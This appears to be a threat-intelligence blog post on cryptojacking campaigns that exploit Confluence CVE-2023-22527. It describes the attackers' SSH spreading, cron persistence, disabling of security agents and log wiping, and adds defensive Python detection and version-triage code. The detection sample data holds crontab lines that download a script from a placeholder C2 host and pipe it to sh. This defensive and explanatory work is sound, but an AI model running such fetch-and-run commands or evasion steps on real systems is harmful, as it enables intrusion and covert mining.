CVE-2023-22527 Cryptojacking Attack Affects Over 1 Million Confluence Servers

According to a recent threat report from cybersecurity firm Trend Micro, there is a rise in cryptojacking attacks exploiting a critical vulnerability, CVE-2023-22527, in the global collaboration and documentation platform Atlassian Confluence. This vulnerability has a CVSS score of 10.0 and a severity rating of ‘Critical’ and allows remote code execution (RCE) attacks on the ‘Confluence Data Center’ and ‘Confluence Server’. In this article, we will examine the cryptojacking attack method that mines cryptocurrency by exploiting the RCE vulnerability in Confluence, along with the threat-hunting method using the CTI search engine.

CVE-2023-22527 Exploit Cases and Cryptojacking Attack Methods

According to the Trend Micro report, cryptojacking attacks exploiting the CVE-2023-22527 vulnerability have surged since June, following Atlassian’s disclosure on January 16, 2024. Confluence versions affected by the CVE-2023-22527 vulnerability are as follows:

  • 8.0.x
  • 8.1.x
  • 8.2.x
  • 8.3.x
  • 8.4.x
  • 8.5.0-8.5.3

Distribution of XMRig Miners Through ELF File Payloads

One of the main attackers was observed executing the attack by deploying an XMRig miner with an ELF file payload.

Malicious request from an attacker exploiting the CVE-2023-22527 vulnerability. Source: Trend Micro Incorporated.

Automation of Mining Through Secure Shell and Data from Shell Scripts

The shell script distributed by another attacker was designed to spread mining to every endpoint reachable over secure shell. The script first terminated all processes running from the */tmp/* directory and all existing cron jobs. It then added a new cron job that checks the connection to the C2 (Command and Control) server every five minutes.

The attacker also used the localgo function to collect the IP address, bash history, and SSH configuration, then automated cryptocurrency mining on other hosts over SSH. Crontab jobs were added in several locations (init.d, cron.hourly, cron.d) under different names (whoami, nginx, apache) to maintain access to the server. A further function removed the Alibaba Cloud Shield security service and, under certain conditions, blocked IP addresses in order to eliminate the Tencent Cloud mirror.

Malicious request from a second attacker exploiting the CVE-2023-22527 vulnerability. Source: Trend Micro Incorporated

After confirming that the cloud monitoring and security services had been terminated or deleted, the attacker first ended the shell script process that exploited CVE-2023-22527 before starting cryptocurrency mining. Prior to mining, the attacker used functions in solr.sh to disable additional security mechanisms that the CVE-2023-22527 exploitation script had not covered. Finally, they removed log files and bash history to erase traces of the breach.
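As an added, defender-side example (not code from the Criminal IP post or the Trend Micro report), the following read-only check looks for the persistence pattern described above: cron entries dropped under generic names in init.d, cron.hourly or cron.d, and a five-minute cron job that pulls content from a remote host. It takes a {path: contents} mapping so it runs offline; the sample files and the c2.example.invalid host are constructed for illustration.

```python
import re
from typing import Dict, List

# Locations and file names reported in the post; nginx/apache alone are not
# evidence (/etc/init.d/nginx is normal on a host that runs nginx).
SUSPECT_DIRS = ("/etc/init.d/", "/etc/cron.hourly/", "/etc/cron.d/")
SUSPECT_NAMES = {"whoami", "nginx", "apache"}
# curl/wget followed by an http(s) URL on the same line
FETCH_RE = re.compile(r"\b(curl|wget)\b[^\n]*https?://")
# cron schedule "*/5 * * * *" at the start of a line (five-minute beacon)
EVERY_5_MIN_RE = re.compile(r"^\s*\*/5\s+\*\s+\*\s+\*\s+\*\s", re.M)

def scan_persistence(files: Dict[str, str]) -> List[str]:
    """Return one finding string per file that matches the persistence pattern."""
    findings = []
    for path, body in files.items():
        name = path.rsplit("/", 1)[-1]
        in_suspect_dir = any(path.startswith(d) for d in SUSPECT_DIRS)
        fetches = bool(FETCH_RE.search(body))
        five_min = bool(EVERY_5_MIN_RE.search(body))
        # Generic name in a startup/cron directory plus a remote fetch or beacon
        if in_suspect_dir and name in SUSPECT_NAMES and (fetches or five_min):
            findings.append(f"{path}: generic name with remote fetch/beacon")
        # Any crontab entry that fetches remote content every five minutes
        elif five_min and fetches:
            findings.append(f"{path}: 5-minute cron job fetching remote content")
    return findings

# Constructed sample: a benign init script, a root crontab beacon, a cron.d
# drop-in under a generic name, and a legitimate cron.d entry.
SAMPLE = {
    "/etc/init.d/nginx": "#!/bin/sh\n### BEGIN INIT INFO\nexec /usr/sbin/nginx\n",
    "/var/spool/cron/root": "*/5 * * * * curl -fsSL http://c2.example.invalid/x.sh | sh\n",
    "/etc/cron.d/apache": "*/5 * * * * root wget -q -O- http://c2.example.invalid/a | sh\n",
    "/etc/cron.d/logrotate": "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
}

if __name__ == "__main__":
    for line in scan_persistence(SAMPLE):
        print(line)
```

On a live host, build the mapping by reading the files under /etc/cron.d, /etc/cron.hourly, /etc/init.d and /var/spool/cron; a hit is a lead for manual review, not a verdict.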

Hunting for CVE-2023-22527 Threats Using Threat Intelligence Search Engine

The product filter in Criminal IP, a threat-hunting tool that searches for Internet-connected assets, allows users to search for servers running specific products. Below is a link to queries and search results related to the Atlassian Confluence server.
As of September 24, 2024, a total of 1,035,877 results were identified.

Search Query: product: Confluence

Results of a search for externally exposed, vulnerable Confluence servers

Not all identified Confluence servers are affected by the CVE-2023-22527 vulnerability; some may run unaffected versions. However, caution is still required, because an externally exposed Confluence server is by itself a target for numerous known and unknown vulnerabilities.

Adding a product_version filter to the existing product: Confluence query allows you to search for a specific version of a Confluence server. The affected Confluence search queries for version 8.5.1 are as follows:

Search Query: product: Confluence product_version:8.5.1

Confluence 8.5.1 server affected by CVE-2023-22527, detected by threat-hunting tool Criminal IP

A total of 176,055 instances of Confluence version 8.5.1 were identified through the search. A look at the IP address report of one of the servers shows that Confluence version 8.5.1 is running on TCP port 9078. In particular, it was found to have a well-known Confluence vulnerability, CVE-2023-22515.
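As an added example (not part of the Criminal IP post), the helper below triages a batch of observed product_version values against the CVE-2023-22527 affected ranges listed earlier (8.0.x to 8.4.x, and 8.5.0 to 8.5.3). It assumes plain "major.minor.patch" strings, treats anything the list does not name (such as 8.5.4 or 8.6.0) as not affected by this list, and reports unparseable values separately rather than silently clearing them.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Affected ranges taken from the post: 8.0.x .. 8.4.x (any patch), 8.5.0 .. 8.5.3
AFFECTED_MINOR_ANY_PATCH = {(8, 0), (8, 1), (8, 2), (8, 3), (8, 4)}
AFFECTED_8_5_MAX_PATCH = 3

def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Parse 'major.minor[.patch]'; a missing patch counts as 0, suffixes are ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def is_affected(text: str) -> Optional[bool]:
    """True if inside the listed ranges, False if outside, None if unparseable."""
    v = parse_version(text)
    if v is None:
        return None
    major, minor, patch = v
    if (major, minor) in AFFECTED_MINOR_ANY_PATCH:
        return True
    return (major, minor) == (8, 5) and patch <= AFFECTED_8_5_MAX_PATCH

def triage(versions: Iterable[str]) -> Tuple[List[str], List[str], List[str]]:
    """Split observed versions into (affected, not affected, needs manual review)."""
    affected: List[str] = []
    clean: List[str] = []
    unknown: List[str] = []
    for ver in versions:
        verdict = is_affected(ver)
        if verdict is None:
            unknown.append(ver)
        elif verdict:
            affected.append(ver)
        else:
            clean.append(ver)
    return affected, clean, unknown

if __name__ == "__main__":
    # Constructed sample of product_version values as a search might return them
    print(triage(["8.5.1", "8.4.2", "8.5.4", "8.6.0", "7.19.2", "unknown"]))
```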

As shown in this case, applications and devices exposed to the internet that are not updated with the latest patches are not only targets for cryptojacking but also for more severe cyber attacks, such as data breaches and system takeovers. Therefore, timely updates and security patches are imperative. Security and infrastructure personnel within organizations should regularly check for open vulnerable ports or neglected assets.

For further information, you can refer to Criminal IP Analysis Report on Zero-Day Vulnerability in Atlassian Confluence and What Is Cryptojacking: Examples and How to Prevent It?.


This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine. Sign up for a free Criminal IP account today to explore the search results mentioned in the report and delve into comprehensive threat intelligence.

Source: Criminal IP (https://www.criminalip.io)
